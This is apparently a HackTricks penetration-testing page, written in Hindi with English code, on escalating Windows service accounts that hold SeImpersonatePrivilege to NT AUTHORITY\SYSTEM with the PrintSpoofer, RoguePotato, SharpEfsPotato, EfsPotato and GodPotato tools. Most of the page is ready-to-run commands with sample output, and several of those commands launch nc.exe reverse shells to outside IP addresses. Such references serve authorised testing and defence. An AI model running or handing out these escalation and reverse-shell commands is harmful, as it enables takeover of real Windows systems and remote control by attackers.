# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato {{#include ../../banners/hacktricks-training.md}} > [!WARNING] > **JuicyPotato Windows Server 2019 और Windows 10 build 1809 से आगे काम नहीं करता**। हालाँकि, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** का उपयोग **समान विशेषाधिकारों का लाभ उठाने और `NT AUTHORITY\SYSTEM`** स्तर की पहुंच प्राप्त करने के लिए किया जा सकता है। यह [ब्लॉग पोस्ट](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) `PrintSpoofer` टूल पर गहराई से जाती है, जिसका उपयोग Windows 10 और Server 2019 होस्ट पर अनुकरण विशेषाधिकारों का दुरुपयोग करने के लिए किया जा सकता है जहाँ JuicyPotato अब काम नहीं करता। ## Quick Demo ### PrintSpoofer ```bash c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -------------------------------------------------------------------------------- [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK NULL ``` ### RoguePotato ```bash c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999 # In some old versions you need to use the "-f" param c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999 ``` ### SharpEfsPotato ```bash > SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0. [+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2 df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: [x]RpcBindingSetAuthInfo failed with status 0x6d3 [+] Server connected to our evil RPC pipe [+] Duplicated impersonation token ready for process creation [+] Intercepted and authenticated successfully, launching program [+] Process created, enjoy! C:\temp>type C:\temp\w.log nt authority\system ``` ### EfsPotato ```bash > EfsPotato.exe "whoami" Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). Part of GMH's fuck Tools, Code By zcgonvh. CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] [+] Current user: NT Service\MSSQLSERVER [+] Pipe: \pipe\lsarpc [!] binding ok (handle=aeee30) [+] Get Token: 888 [!] process with pid: 3696 created. ============================== [x] EfsRpcEncryptFileSrv failed: 1818 nt authority\system ``` ### GodPotato ```bash > GodPotato -cmd "cmd /c whoami" # You can achieve a reverse shell like this. > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` ### DCOMPotato ![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa) ## References - [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) - [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) - [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) - [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) - [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) - [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) - [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) {{#include ../../banners/hacktricks-training.md}}